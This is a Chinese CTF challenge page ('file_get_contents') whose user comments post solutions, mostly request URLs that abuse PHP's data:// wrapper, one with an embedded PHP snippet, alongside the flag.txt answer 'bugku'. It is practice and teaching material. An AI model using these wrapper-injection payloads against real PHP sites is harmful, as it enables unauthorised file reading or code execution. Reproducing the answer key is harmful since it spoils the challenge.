file_get_contentsWEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: npfs
一血奖励: 2金币
解  决: 5269
提  示:
描  述:
file_get_contents????
评论
Hacker23 1月前

http://160.202.254.160:15622/?ac=%3C?php%20echo%201;?%3E&fn=data://text/plain,%3C?php%20echo%201;?%3E

回复 0

Hacker23 1月前

http://160.202.254.160:15622/?ac=hello&fn=data://text/plain,hello

回复 0

Cipher07 1月前

?ac=flag&fn=data://text/plain,flag加上就行了哦

回复 1

微笑刺客 1月前

根据题意,会把输入得内容与ac值进行比较,使用php://input伪协议控制文件内容,读取并返回一个值,然后令ac=相同得值即可直接得出flag,http://160.202.248.161:16606/?fn=data://text/plain,test&ac=test

回复 0

suxiansheng 2月前

http://171.80.2.169:14784/?ac=bugku&fn=flag.txt

回复 0

抗着破烂上靶场 2月前

用dirsearch扫描之后发现有个flag.txt文件,直接把fn指向这个文件,f被赋值为文件中的内容,ac直接赋值成文件的内容就行

回复 0

testctffff 2月前

这题就是考察data://的用法。 当data://后跟php代码时,会执行代码。 后跟字符串时,会直接输出。

回复 0

Hrkh 9月前

使用dirsearch扫描,找到一个flag.txt打开后里边内容为bugku,传参?ac=bugku&fn=flag.txt得到FLAG

回复 3

zxcvbnmzhang 10月前

?ac=hello&fn=data://text/plain,hello

回复 3

ibuprofen 10月前

?ac=bugku&fn=flag.txt

回复 1

WriteUp

image
harry

3 金币

评分(7)

解题动态

rschei7 攻破了该题 12小时前
billy856 攻破了该题 15小时前
zwx1998 攻破了该题 1天前
TryShallow 攻破了该题 1天前
Sylvia 攻破了该题 1天前
千城不是城 攻破了该题 2天前
zhzuo 攻破了该题 2天前
misaki66 攻破了该题 2天前
王永诺诺 攻破了该题 3天前
YANGLINSHENG2503940126 攻破了该题 4天前
qwe1534 攻破了该题 5天前
MCTC6 攻破了该题 5天前
江一恭 攻破了该题 5天前
dwx386572657 攻破了该题 5天前
rhcrhc 攻破了该题 5天前
luobosir 攻破了该题 6天前
zhzz 攻破了该题 6天前
1345736679 攻破了该题 6天前
fi1y 攻破了该题 6天前
AchOngggggg. 攻破了该题 7天前
问题反馈